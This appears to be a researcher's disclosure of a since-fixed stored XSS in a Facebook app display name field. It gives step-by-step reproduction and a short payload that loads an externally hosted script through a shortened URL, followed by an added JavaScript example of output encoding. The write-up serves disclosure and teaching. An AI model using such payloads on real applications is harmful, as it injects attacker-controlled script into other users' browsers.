The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
- I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
- I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
- I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
- I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
- I opened the Action Types section.
- An alert popup showing "/XSSed/" was displayed on my browser--the script was activated.
This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.
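
The steps above show that the 32-character limit on the display name did not stop the markup from being stored and later rendered. The sketch below is an added example, not part of the original post and not Facebook's code: it contrasts a length check with HTML output encoding, using the display name from the post as constructed sample input. The function names and the heading template are hypothetical.

```javascript
// Added illustration: names and markup are hypothetical, not Facebook's code.
const MAX_DISPLAY_NAME = 32; // length limit stated in the post

// The display name from the post, used here as constructed sample input.
const SAMPLE_NAME = '<script src=//goo.gl/p3skt/><!--';

// A length check alone accepts anything that fits, markup included.
function passesLengthCheck(name) {
  return typeof name === 'string' && name.length <= MAX_DISPLAY_NAME;
}

// Encode the characters that are significant in HTML text and in
// quoted attribute values. '&' is handled in the same single pass,
// so already-encoded input is not double-decoded or skipped.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored value is concatenated into markup as-is.
function renderHeadingUnsafe(name) {
  return '<h2>Action Types for ' + name + '</h2>';
}

// Hardened pattern: encode at output time, for the HTML text context.
function renderHeadingSafe(name) {
  return '<h2>Action Types for ' + escapeHtml(name) + '</h2>';
}

console.log('fits limit:', passesLengthCheck(SAMPLE_NAME));
console.log('unsafe    :', renderHeadingUnsafe(SAMPLE_NAME));
console.log('safe      :', renderHeadingSafe(SAMPLE_NAME));
```

The encoded output displays the name as literal text, so the browser never parses a script element from it.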